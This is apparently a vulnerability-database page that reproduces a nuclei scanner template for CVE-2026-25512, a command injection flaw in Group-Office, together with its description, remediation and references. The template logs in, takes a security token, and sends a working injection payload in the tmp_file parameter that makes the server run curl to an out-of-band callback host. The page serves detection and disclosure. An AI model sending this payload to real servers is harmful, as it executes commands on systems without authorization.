Lucene search
K

Group-Office < 26.0.5 - Remote Code Execution

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Group-Office before 6.8.150, 25.0.82, 26.0.5 enables authenticated remote code execution via tmp_file.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-25512
4 Feb 202622:59
githubexploit
ATTACKERKB
CVE-2026-25512
4 Feb 202620:39
attackerkb
Circl
CVE-2026-25512
3 Mar 202621:02
circl
CNNVD
Group Office 操作系统命令注入漏洞
4 Feb 202600:00
cnnvd
CVE
CVE-2026-25512
4 Feb 202620:39
cve
Cvelist
CVE-2026-25512 Group-Office is vulnerable to RCE due to Command Injection via TNEF Attachment Handler
4 Feb 202620:39
cvelist
EUVD
EUVD-2026-5349
4 Feb 202620:39
euvd
NVD
CVE-2026-25512
4 Feb 202621:16
nvd
OSV
CVE-2026-25512 Group-Office is vulnerable to RCE due to Command Injection via TNEF Attachment Handler
4 Feb 202620:39
osv
Positive Technologies
PT-2026-6304
4 Feb 202600:00
ptsecurity
Rows per page
id: CVE-2026-25512

info:
  name: Group-Office < 26.0.5 - Remote Code Execution
  author: omarkurt
  severity: critical
  description: |
    Group-Office before versions 6.8.150, 25.0.82, and 26.0.5 is vulnerable to remote code execution via OS command injection. The endpoint email/message/tnefAttachmentFromTempFile directly concatenates the user-controlled parameter tmp_file into an exec() call. By injecting shell metacharacters into tmp_file, an authenticated attacker can execute arbitrary system commands on the server.
  impact: |
    Successful exploitation allows an authenticated attacker to execute arbitrary system commands with web server privileges, potentially leading to full server compromise.
  remediation: |
    Update Group-Office to version 6.8.150, 25.0.82, or 26.0.5 or later. The fix applies escapeshellarg() to properly escape file paths before passing them to exec().
  reference:
    - https://github.com/Intermesh/groupoffice/security/advisories/GHSA-579w-jvg7-frr4
    - https://github.com/Intermesh/groupoffice/commit/6c612deca97a6cd2a1bd4feea0ce7e8e9d907792
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25512
    - https://vulnerabletarget.com/VT-2026-25512
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2026-25512
    cwe-id: CWE-78
    epss-score: 0.18536
    epss-percentile: 0.96901
  metadata:
    verified: true
    max-request: 2
    vendor: intermesh
    product: group-office
    shodan-query: title:"Group-Office"
    fofa-query: title="Group-Office"
  tags: cve,cve2026,groupoffice,rce,authenticated,oast

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /index.php?r=core/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"success\":true")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: security_token
        part: body
        group: 1
        regex:
          - '"security_token":"([^"]+)"'
        internal: true

  - raw:
      - |
        GET /index.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=dummy.dat;curl+{{interactsh-url}};%23&security_token={{security_token}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4a0a0047304502203b64fb57f5fbd76a120e1308dc5c0a5fc8cceacaeb8876f61353a4ccae6dc695022100b10b3bd06ddf3f93f6d9476dc8a0780f297a5ae79843e8678505a10cc4a0c036:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 15:08Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.18.8
CVSS 49.4
EPSS0.18536
SSVC
13